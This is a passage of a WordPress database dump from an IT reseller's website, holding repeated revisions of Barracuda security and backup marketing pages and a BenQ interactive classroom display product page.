costs.</p><p><strong>Moving from the Data Center to the Public Cloud</strong></p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesnâ€™t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.</p><h3>Data Protection</h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.</p><h4>Barracuda Backup</h4><p>Cloud-integrated protection for business-critical data wherever it resides</p><h4>Cloud-to-Cloud Backup</h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss</p>','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2019-01-04 11:27:54','2019-01-04 03:27:54','',1445,'https://bintara.com.my/blog/2019/01/04/1445-revision-v1/',0,'revision','',0),(2801,1,'2019-01-04 11:25:09','2019-01-04 03:25:09','<p>Barracuda\'s wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.</p><h3>Email Protection</h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.</p>https://youtu.be/HuMxGXS6IxE<p><strong>Next-Generation Email Security</strong><br />As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.</p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.</p>https://youtu.be/ds9fjUyPyoY<h3>Network and Application Security</h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data â€“ regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.</p><p><strong>Moving from the Data Center to the Public Cloud</strong></p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesnâ€™t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.</p><h3>Data Protection</h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.</p><h4>Barracuda Backup</h4><p>Cloud-integrated protection for business-critical data wherever it resides</p><h4>Cloud-to-Cloud Backup</h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss</p><h3>Filters Content, Malware, Social Media and Rogue App Threats</h3>\nThe Barracuda Web Security Gateway lets organizations benefit from online applications and tools without exposure to web-borne malware and viruses, lost user productivity, and misused bandwidth. As a comprehensive solution for web security and management, it unites award-winning spyware, malware, and virus protection with a powerful policy and reporting engine. Advanced features ensure that organizations adapt to emerging requirements like social-network regulation, remote filtering, and visibility into SSL-encrypted traffic.\nUnlimited remote user licenses are included to enforce content and access policies for mobile and desktop devices outside of the corporate network. The Barracuda Web Security Gateway is also available as a virtual appliance.\n<h3>Enforce Corporate Policies</h3>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/ENFORCE-CORPORATE-POLICIES.png\" alt=\"\" width=\"268\" height=\"244\" />\nIncrease productivity, regulate bandwidth usage, and prevent risky behavior by enforcing granular policies on user activities. The Barracuda Web Security Gateway can control access to web sites, applications, and Web 2.0 platforms based on users, groups, time, bandwidth, and other criteria. SSL-filtering and inspection capabilities provide policy enforcement on social-media and search platforms that are otherwise obfuscated.\n<h3>Protect Against Web-Based Threats</h3>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Protect-Against-Web-Based-Threats.png\" alt=\"\" width=\"326\" height=\"179\" />\nKeep networks and users safe by blocking spyware downloads, preventing viruses, and restricting requests to malicious websites by leveraging intelligence from thousands of collection points worldwide. Our award-winning antivirus and anti-spyware technologies combine preventive, proactive, and reactive measures to deliver industry-leading content filtering and malware protection.\n<h3>Monitor Network and User Activity</h3>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/MONITOR-NETWORK-AND-USER-ACTIVITY.png\" alt=\"\" width=\"283\" height=\"230\" />\nGain complete insight into user activity and network threats via an intuitive dashboard and integrated reporting. This clear visibility lets administrators create effective policies and generate proactive alerts to properly respond to threats.\nIn addition to powerful on-board reporting, you can also deploy a Barracuda Reporting Server.\nThe Barracuda Reporting Server is a powerful platform that enables unified reporting for Barracuda Web Security Gateways. Designed to meet the demands of reporting on increasing amounts of user and security data, the Barracuda Reporting Server generates accurate, customizable reports in a fraction of the time that it takes built-in reporting engines, while also enabling aggregated reports for multiple connected devices.\n<h3>Secure Laptops and Mobile Devices</h3>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/SECURE-LAPTOPS-AND-MOBILE-DEVICES.png\" alt=\"\" width=\"291\" height=\"227\" />\nExtend security and policies to remote users.Â  With the Barracuda Web Security Agent and the Barracuda Safe Browser, traffic from remote clients can be filtered with the same policies set for on-network users.\n<h3>Simplify Management</h3>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/SIMPLIFY-MANAGEMENT.png\" alt=\"\" width=\"245\" height=\"237\" />\nCentrally manage the Barracuda Web Security Gateway through the cloud. Configurations on the Barracuda Web Security Gateway are simple and easy-to-deploy ensuring customized network protection is in place in a matter of minutes.\n<img src=\"https://www.barracuda.com/assets/images/common/data_protection.svg\" alt=\"Barracuda Data Protection Icon\" width=\"21\" height=\"24\" />Â  <strong>Data Protection</strong>\nBarracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.\nTo discover more, please click the button below or contact us to discuss your needs.\n[maxbutton id=\"1\" ]','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2019-01-04 11:25:09','2019-01-04 03:25:09','',1445,'https://bintara.com.my/blog/2019/01/04/1445-revision-v1/',0,'revision','',0),(2804,1,'2019-01-04 11:38:32','2019-01-04 03:38:32','<p><strong>Barracuda\'s</strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.</p><h3>Email Protection</h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.</p>https://youtu.be/HuMxGXS6IxE<p><strong>Next-Generation Email Security</strong><br />As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.</p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.</p>https://youtu.be/ds9fjUyPyoY<h3>Network and Application Security</h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data â€“ regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.</p><p><strong>Moving from the Data Center to the Public Cloud</strong></p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesnâ€™t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.</p><h3>Data Protection</h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.</p><h4>Barracuda Backup</h4><p>Cloud-integrated protection for business-critical data wherever it resides</p><h4>Cloud-to-Cloud Backup</h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss</p><h2>Donâ€™t Be a Ransomware Victim</h2><h3>Ransomware is on the rise. Barracudaâ€™s multi-layered defense protects your data (and your money).</h3><p>Understanding Ransomware<br />Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.</p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.</p><p>47% of businesses have been affected by ransomware.<br />The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.<br />59% of ransomware infections are delivered via email attachments and embedded URLs.</p>https://youtu.be/zNkTopX68tk','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2019-01-04 11:38:32','2019-01-04 03:38:32','',1445,'https://bintara.com.my/blog/2019/01/04/1445-revision-v1/',0,'revision','',0),(2805,1,'2019-01-04 14:58:49','2019-01-04 06:58:49','<p><strong>Barracuda\'s</strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.</p><h3>Email Protection</h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.</p>https://youtu.be/HuMxGXS6IxE<p><strong>Next-Generation Email Security</strong><br />As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.</p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.</p>https://youtu.be/ds9fjUyPyoY<h3>Network and Application Security</h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data â€“ regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.</p><p><strong>Moving from the Data Center to the Public Cloud</strong></p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesnâ€™t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.</p><h3>Data Protection</h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.</p><h4>Barracuda Backup</h4><p>Cloud-integrated protection for business-critical data wherever it resides</p><h4>Cloud-to-Cloud Backup</h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss</p><h2>Donâ€™t Be a Ransomware Victim</h2><h3>Ransomware is on the rise. Barracudaâ€™s multi-layered defense protects your data (and your money).</h3><p>Understanding Ransomware<br />Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.</p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.</p><ul><li>47% of businesses have been affected by ransomware.</li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.</li><li>59% of ransomware infections are delivered via email attachments and embedded URLs.</li></ul>https://youtu.be/zNkTopX68tk','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2019-01-04 14:58:49','2019-01-04 06:58:49','',1445,'https://bintara.com.my/blog/2019/01/04/1445-revision-v1/',0,'revision','',0),(2806,1,'2019-01-04 15:04:33','2019-01-04 07:04:33','<p><strong>Barracuda\'s</strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.</p><h3>Email Protection</h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.</p>https://youtu.be/HuMxGXS6IxE<p><strong>Next-Generation Email Security</strong><br />As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.</p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.</p>https://youtu.be/ds9fjUyPyoY<h3>Network and Application Security</h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data â€“ regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.</p><p><strong>Moving from the Data Center to the Public Cloud</strong></p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesnâ€™t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.</p><h3>Data Protection</h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.</p><h4>Barracuda Backup</h4><p>Cloud-integrated protection for business-critical data wherever it resides</p><h4>Cloud-to-Cloud Backup</h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss</p><h2>Donâ€™t Be a Ransomware Victim</h2><h3>Ransomware is on the rise. Barracudaâ€™s multi-layered defense protects your data (and your money).</h3><p>Understanding Ransomware<br />Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.</p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.</p><ul><li>47% of businesses have been affected by ransomware.</li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.</li><li>59% of ransomware infections are delivered via email attachments and embedded URLs.</li></ul>https://youtu.be/zNkTopX68tk<h3>Barracuda provides a complete family of solutions that work together to help you detect, prevent, and recover from ransomware attacks.</h3>		\n			<h4>Detect</h4>		\n		<p>Detect ransomware and other advanced threats, using automated online threat scanners (offered at no charge) and advanced, multi-layer detection technologies including sandbox analysis.</p>		\n			<h4>Prevent</h4>		\n		<p>Prevent them from infecting your systems, thanks to best-of-breed products to secure your network perimeter, email, web traffic, and outward-facing web applications.</p>		\n			<h4>Recover</h4>		\n		<p>Recover quickly and easily in case attackers are successful, with state-of-the-art backup solutions that leave attackers with nothing, while you get right back to business.</p>','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2019-01-04 15:04:33','2019-01-04 07:04:33','',1445,'https://bintara.com.my/blog/2019/01/04/1445-revision-v1/',0,'revision','',0),(2808,1,'2019-01-04 15:31:59','2019-01-04 07:31:59','<p><strong>Barracuda\'s</strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.</p><h3>Email Protection</h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.</p>https://youtu.be/HuMxGXS6IxE<p><strong>Next-Generation Email Security</strong><br />As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.</p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.</p>https://youtu.be/ds9fjUyPyoY<h3>Network and Application Security</h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data â€“ regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.</p><p><strong>Moving from the Data Center to the Public Cloud</strong></p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesnâ€™t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.</p><h3>Data Protection</h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.</p><h4>Barracuda Backup</h4><p>Cloud-integrated protection for business-critical data wherever it resides</p><h4>Cloud-to-Cloud Backup</h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss</p><h2>Donâ€™t Be a Ransomware Victim</h2><h3>Ransomware is on the rise. Barracudaâ€™s multi-layered defense protects your data (and your money).</h3><p>Understanding Ransomware<br />Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.</p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.</p><ul><li>47% of businesses have been affected by ransomware.</li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.</li><li>59% of ransomware infections are delivered via email attachments and embedded URLs.</li></ul>https://youtu.be/zNkTopX68tk<h3>Barracuda provides a complete family of solutions that work together to help you detect, prevent, and recover from ransomware attacks.</h3>		\n			<h4>Detect</h4>		\n		<p>Detect ransomware and other advanced threats, using automated online threat scanners (offered at no charge) and advanced, multi-layer detection technologies including sandbox analysis.</p>		\n			<h4>Prevent</h4>		\n		<p>Prevent them from infecting your systems, thanks to best-of-breed products to secure your network perimeter, email, web traffic, and outward-facing web applications.</p>		\n			<h4>Recover</h4>		\n		<p>Recover quickly and easily in case attackers are successful, with state-of-the-art backup solutions that leave attackers with nothing, while you get right back to business.</p><h2>Why is Backup Necessary for Office 365?</h2><p>The number one cause of data loss in a SaaS deployment, such as Microsoft Office 365, is accidental data deletion. In fact, about 70 percent of all lost data is due to either accidental or malicious deletion of data by end-users. Other ways that data can be lost include misconfiguration, client sync issues, and most recently the widespread presence of malware and ransomware, which can render data unusable.</p><p>Although Microsoft Office 365 provides some basic recovery options with the recycle bin and email retention, Microsoftâ€™s primary focus within Office 365 is ensuring that service and data availability are not disrupted. It is your responsibility to protect the data that you store in the Office 365 cloud. Barracuda Cloud-to-Cloud Backup provides comprehensive, cost-effective, and scalable protection of your Office 365 data â€“without adding to your infrastructure costs.</p><h3>What We Protect</h3><p>Barracudaâ€™s Cloud-to-Cloud Backup Service backs up all of your Office 365 data to secure Barracuda Cloud Storage with no need for on-premises infrastructure. You can back up data on demand or according to an automated schedule. All Exchange Online, SharePoint Online, and OneDrive for Business data is deduplicated and compressed for maximum storage efficiency and reduced backup windows before being stored in the Barracuda Cloud.</p><p>Exchange Online. Barracuda protects the complete folder structure of each userâ€™s mailbox including all email message and attachments.<br />OneDrive for Business. All files and folders under the Documents Library are protected.<br />SharePoint Online. We protect SharePoint data including Document Libraries, Site Assets, and Picture Libraries within both Team Sites and Public Sites are protected.</p><h3>Fast and Easy Recovery Options</h3><p>All Office 365 data backed up to the Barracuda Cloud is accessible, searchable, and retrievable from anywhere with an Internet connection. Data can be recovered from the site level down to the individual item level. Messages, folders, or even entire mailboxes and be restored back to the original user and location, to a different location within the account, or to a completely different user account. You can also download items for offline use.</p><p>If youâ€™re looking for a specific file or message but are unsure of its location, the search feature can be used to find the item quickly and easily. You can also recover data to a specific point in time by selecting the specific dates from a built-in calendar. Recovered data is compressed to minimize download times.</p><h3>Powerful Reporting and Statistics</h3><p>For IT Administrators, detailed reporting and audit logging are a key component of a backup solution. Barracuda Cloud-to-Cloud Backup provides backup status and health monitoring for each backup source. Automated email alerts are delivered after each backup to specified email recipients containing a summary of the backup and detailed information about which email messages, folders, and files were added, modified, and removed since the last backup.</p><p>On the Status page, graphs show the number of items added and amount of data backed up each day. Storage statistics and graphs detail how much data has been backed up overall and the storage efficiency, as well as how much data is actually being stored in the Barracuda Cloud after deduplication and compression. An Audit Log tracks and provides details about every action performed within the Cloud-to-Cloud Backup interface.</p>','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2019-01-04 15:31:59','2019-01-04 07:31:59','',1445,'https://bintara.com.my/blog/2019/01/04/1445-revision-v1/',0,'revision','',0),(2817,1,'2019-01-07 16:26:57','2019-01-07 08:26:57','','Board Management','','inherit','closed','closed','','board-management-2','','','2019-01-07 16:26:57','2019-01-07 08:26:57','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1.png',0,'attachment','image/png',0),(2818,1,'2019-01-07 16:28:42','2019-01-07 08:28:42','','edu-rp750k-21-1','','inherit','closed','closed','','edu-rp750k-21-1','','','2019-01-07 16:28:42','2019-01-07 08:28:42','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png',0,'attachment','image/png',0),(2819,1,'2019-01-07 16:32:43','2019-01-07 08:32:43','','low-bluelight','','inherit','closed','closed','','low-bluelight','','','2019-01-07 16:32:43','2019-01-07 08:32:43','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png',0,'attachment','image/png',0),(2820,1,'2019-01-07 16:34:55','2019-01-07 08:34:55','','rp750k-interactive-flat-panel-eye-care-solution-1-before','','inherit','closed','closed','','rp750k-interactive-flat-panel-eye-care-solution-1-before','','','2019-01-07 16:34:55','2019-01-07 08:34:55','',1447,'https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png',0,'attachment','image/png',0),(2812,1,'2019-01-04 16:21:43','2019-01-04 08:21:43','','Board Management','','inherit','closed','closed','','board-management','','','2019-01-04 16:21:43','2019-01-04 08:21:43','',1448,'https://bintara.com.my/wp-content/uploads/2019/01/Board-Management.png',0,'attachment','image/png',0),(2843,1,'2019-01-07 17:42:10','2019-01-07 09:42:10','<h3>BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70â€™â€™</h3>		\n		<h4>4K UHD 70â€™â€™ Education Interactive Flat Panel Display | RP704K</h4><p><strong>Your Caring Mate for Enhanced Interactive Learning</strong></p><p><br />The RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.</p>		\n										<img width=\"800\" height=\"487\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png 1024w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-300x182.png 300w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-768x467.png 768w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1.png 1110w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>Create a Healthy Learning Environment for Students</h4>		\n										<img width=\"560\" height=\"258\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png 560w, https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1-300x138.png 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>Germ-Resistant Screen</strong><br />The Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silverâ€™s antimicrobial feature remains effective even after thorough cleaning or long periods of use.</p><p><strong>* TUV Test Confirmed</strong><br />TUV is the worldâ€™s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUVâ€™s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screenâ€™s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQâ€™s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.</p><p><strong>Smart Eye-Care Solution</strong></p><p>The Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.<br />*For Android devices, BenQâ€™s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.</p><p><strong>TÃœV-Certified Low Blue Light Technology</strong></p><p>Blue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQâ€™s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.</p>		\n										<img width=\"642\" height=\"438\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png 642w, https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight-300x205.png 300w\" sizes=\"(max-width: 642px) 100vw, 642px\" />											\n										<img width=\"616\" height=\"395\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png 616w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before-300x192.png 300w\" sizes=\"(max-width: 616px) 100vw, 616px\" />											\n		<p><strong>Anti-Glare Display</strong></p><p>Screen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704Kâ€™s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.</p>		\n			<h4>EZWrite 4.1 : An Easy and Fun Annotation Solution</h4>		\n		<p><strong>Intelligent Handwriting Recognition</strong></p><p>The Smartboard RP704Kâ€™s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.</p>		\n										<img width=\"560\" height=\"352\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22-300x189.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n										<img width=\"510\" height=\"361\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01-300x212.jpg 300w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p><strong>Wireless Solution for Seamless Collaboration</strong></p><p>InstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.</p><p><strong>20-Point Multi-Touch Interactivity</strong></p><p>As the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.</p>		\n										<img width=\"510\" height=\"330\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02-300x194.jpg 300w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n			<h4>Facilitate Teaching Flow with Friendly Design</h4>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png\" alt=\"\" 